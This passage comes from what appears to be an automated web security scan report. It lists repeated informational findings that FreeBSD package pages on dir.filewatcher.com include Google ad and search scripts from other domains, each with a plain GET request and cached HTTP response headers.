...[SNIP]...

21.57. http://dir.filewatcher.com/d/FreeBSD/6.2-release/sparc64/aub-2.2.tbz.41730.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6.2-release/sparc64/aub-2.2.tbz.41730.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/6.2-release/sparc64/aub-2.2.tbz.41730.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:44 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IX+4NbTcwTYmvINLD7P4yg"
Content-Length: 22277
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 231
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.58. http://dir.filewatcher.com/d/FreeBSD/6.3-release.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6.3-release.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/6.3-release.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 13:45:17 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "wovoUJK7xXuCXEm2nnNB8A"
Content-Length: 4664
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 13:45:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
Age: 4911
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/6.3-release/</title>
</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.59. http://dir.filewatcher.com/d/FreeBSD/6.3-release/amd64/aub-2.2.tbz.41893.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6.3-release/amd64/aub-2.2.tbz.41893.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/6.3-release/amd64/aub-2.2.tbz.41893.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:31 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "m14cFzBrRTyJJddwL+HG4g"
Content-Length: 25745
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:31 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 214
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.60. http://dir.filewatcher.com/d/FreeBSD/6.3-release/i386/aub-2.2.tbz.41785.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6.3-release/i386/aub-2.2.tbz.41785.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/6.3-release/i386/aub-2.2.tbz.41785.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:33 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "MrP66mXsA4WtHHC/w3asQw"
Content-Length: 25643
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 214
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.61. http://dir.filewatcher.com/d/FreeBSD/7-current.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/7-current.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/7-current.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:41 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "vpbhFP/nU1vPjmvIqFS+2g"
Content-Length: 4759
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 230
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/7-current/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.62. http://dir.filewatcher.com/d/FreeBSD/7-current/amd64.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/7-current/amd64.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/7-current/amd64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:37 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "pouNGBNzVznpm4Rmeuxu8A"
Content-Length: 15932
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 215
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/7-current/amd64/</title
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.63. http://dir.filewatcher.com/d/FreeBSD/7-current/amd64/aub-2.2.tbz.41904.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/7-current/amd64/aub-2.2.tbz.41904.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/7-current/amd64/aub-2.2.tbz.41904.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:36 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "pAEPFOHU2mnYiuFV7WGw+w"
Content-Length: 25095
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 216
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.64. http://dir.filewatcher.com/d/FreeBSD/7-current/ia64/aub-2.2.tbz.41797.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/7-current/ia64/aub-2.2.tbz.41797.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/7-current/ia64/aub-2.2.tbz.41797.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:38 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "L0usVmTHrXrSD7hv8gWhAg"
Content-Length: 23138
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 217
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.65. http://dir.filewatcher.com/d/FreeBSD/7.0-release.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/7.0-release.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/7.0-release.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:23 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "fLtSn22yj+pSHx2NHIp0AA"
Content-Length: 4664
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 215
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/7.0-release/</title>
</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.66. http://dir.filewatcher.com/d/FreeBSD/7.0-release/amd64/aub-2.2.tbz.41906.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/7.0-release/amd64/aub-2.2.tbz.41906.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/7.0-release/amd64/aub-2.2.tbz.41906.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:15 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ELLhiiMD7yqGLFeQ0s87kA"
Content-Length: 25796
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 198
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.67. http://dir.filewatcher.com/d/FreeBSD/7.0-release/i386/aub-2.2.tbz.41895.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/7.0-release/i386/aub-2.2.tbz.41895.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/7.0-release/i386/aub-2.2.tbz.41895.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:17 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "BhgQiQdlEC4RQFMip3u91w"
Content-Length: 25724
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 205
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.68. http://dir.filewatcher.com/d/FreeBSD/7.0-release/sparc64/aub-2.2.tbz.41941.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/7.0-release/sparc64/aub-2.2.tbz.41941.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/7.0-release/sparc64/aub-2.2.tbz.41941.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:20 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GjJmICQXTmvRx3IXwKzHFg"
Content-Length: 26054
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 203
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.69. http://dir.filewatcher.com/d/FreeBSD/8-current.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/8-current.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/8-current.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:43 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "cyW2PMprK1qa1U34+TL0eA"
Content-Length: 4654
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 232
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/8-current/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.70. http://dir.filewatcher.com/d/FreeBSD/8-current/amd64.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/8-current/amd64.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/8-current/amd64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:42 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "aT+KeR04oiD7Xb2ZILBjxw"
Content-Length: 15827
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 232
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/8-current/amd64/</title
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.71. http://dir.filewatcher.com/d/FreeBSD/8-current/amd64/aub-2.2.tbz.41917.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/8-current/amd64/aub-2.2.tbz.41917.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/8-current/amd64/aub-2.2.tbz.41917.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:41 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "s2mj51RYwAHAE2nf1YJJzg"
Content-Length: 25311
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 233
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.72. http://dir.filewatcher.com/d/FreeBSD/distfiles.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/distfiles.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/distfiles.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:30 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "LnigdWAZxzdvvjKtvYsYzQ"
Content-Length: 5076
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 211
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/distfiles/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.73. http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/aub-2.1.3.tar.gz.55334.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/distfiles/Other/aub-2.1.3.tar.gz.55334.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
